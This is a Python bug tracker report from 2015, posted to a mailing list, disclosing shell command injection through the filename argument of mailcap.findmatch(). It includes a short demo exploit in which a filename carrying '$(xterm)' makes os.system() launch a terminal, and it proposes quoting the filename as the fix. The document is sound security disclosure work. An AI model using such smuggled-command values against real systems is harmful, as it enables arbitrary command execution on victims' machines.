[New-bugs-announce] [issue24778] mailcap.findmatch() ........ Shell Command Injection in filename
Bernd Dietzel
report at bugs.python.org
Sun Aug 2 10:25:07 CEST 2015
New submission from Bernd Dietzel:
if the filename contains Shell Commands they will be executed if they
are passed to os.system() as discribed in the docs.
Filename should be quoted with quote(filename) to fix the bug.
https://docs.python.org/2/library/mailcap.html
"mailcap.findmatch(/caps/, /MIMEtype/[, /key/[, /filename/[, /plist/]]])
Return a 2-tuple; the first element is a string containing the
command line to be executed
(which can be passed to*os.system() *),
......"
Exploid Demo wich runs xterm but should not :
=============================
import mailcap
d=mailcap.getcaps()
commandline,MIMEtype=mailcap.findmatch(d, "text/*", filename="'$(xterm);#.txt")
## commandline = "less ''$(xterm);#.txt'"
import os
os.system(commandline)
## xterm starts
=============================
By the way ... please do not use os.system() in your code, makes it unsafe.
Best regards
Bernd Dietzel
Germany
----------
components: Library (Lib)
files: screenshot.png
messages: 247857
nosy: TheRegRunner
priority: normal
severity: normal
status: open
title: mailcap.findmatch() ........ Shell Command Injection in filename
type: security
versions: Python 2.7
Added file: http://bugs.python.org/file40099/screenshot.png
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24778>
_______________________________________
More information about the New-bugs-announce
mailing list